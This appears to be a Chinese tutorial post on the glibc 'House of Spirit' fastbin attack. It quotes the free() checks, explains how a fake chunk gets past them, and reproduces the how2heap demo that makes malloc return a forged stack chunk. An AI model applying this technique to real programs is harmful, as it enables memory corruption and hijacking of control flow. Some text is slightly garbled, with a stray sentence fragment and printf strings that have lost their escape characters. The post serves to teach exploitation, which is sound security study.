这个技术也是针对于fastbin,属于fastbin_attack的一种。
关键:目标位置伪造fastbin chunk并将其释放,进而实现在指定地址分配chunk
关于free时候的检查:
- free检查会看size的低字节flag的IS_MMAP标志位,M标志位没有被置1才会绕过检查,否则就会调用munmap_chunk函数去释放堆块
1.free的chunk的size不可以太离谱,不要太大太小,并且chunk要对齐
if (__builtin_expect((uintptr_t)p > (uintptr_t)-size, 0)
|| __builtin_expect(misaligned_chunk(p), 0))
malloc_printerr("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size)))
malloc_printerr("free(): invalid size");
2.free的时候也会检查当前Chunk的下一个chunk,也是不能太小不能太大(大于2*SIZE_SZ小于system_mem)其中SIZE_SZ在32位上是4,64位上是8
if (__builtin_expect(chunksize_nomask(chunk_at_offset(p, size))
<= 2 * SIZE_SZ, 0)
|| __builtin_expect(chunksize(chunk_at_offset(p, size))
>= av->system_mem, 0))
检查绕过:
- fake chunk 的ISMMAP位不能是1 ,因为free的时候如果 是mmap的话 会被单独 处理
- fake chunk 的地址需要对齐
- fake chunk的size大小满足fastbin,并且对齐
- fake chunk的size大小不能小于2*SIZE_SZ(4或者8),同时不能大于av->system_mem。
- fake chunk对应的fastbin链表头部不能是该fake chunk,即是不能构成double free的情形
利用条件:
- 想要控制的区域的前段空间和后端空间都是内存可控的
1.我们想要控制的目标内存一般是返回地址或者函数指针 ,这个应该属于.text段,所以一般情况下这段内存是我们的输入无法控制的,就是我们控制不了的意思。
2.存在可将堆变量指针覆盖指向为可控区域,即上一步中的区域
how2heap里面的相关源码我们可以看一下:
配出来的时候,就有可能改写我们目标区域。还是像以前一样,先上一段代码给大家一个直观印象再具体解释,这段代码是shellfish的github里面的源码。
#include <stdio.h>
#include <stdlib.h>
int main()
{
printf("This file demonstrates the house of spirit attack.n");
printf("Calling malloc() once so that it sets up its memory.n");
malloc(1);
printf("We will now overwrite a pointer to point to a fake 'fastbin' region.n");
unsigned long long *a;
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
printf("This region must contain two chunks. The first starts at %p and the second at %p.n", &fake_chunks[1], &fake_chunks[7]);
printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.n");
printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. n");
fake_chunks[1] = 0x40; // this is the size
printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .n");
fake_chunks[9] = 0x2240; // nextsize
printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.n", &fake_chunks[1]);
printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.n");
a = &fake_chunks[2];
printf("Freeing the overwritten pointer.n");
free(a);
printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!n", &fake_chunks[1], &fake_chunks[2]);
printf("malloc(0x30): %pn", malloc(0x30));
}
解析和思路:
- 伪造堆块:在可控区域输入数据进而把它伪造成为一个fastbin
- 覆盖堆指针指向上一步伪造的堆块
- 释放堆块,讲伪造的堆块释放到fastbin单链表里面
- 申请堆块,讲刚释放的堆块申请出来,最终使得可以向目标内存里面写入数据
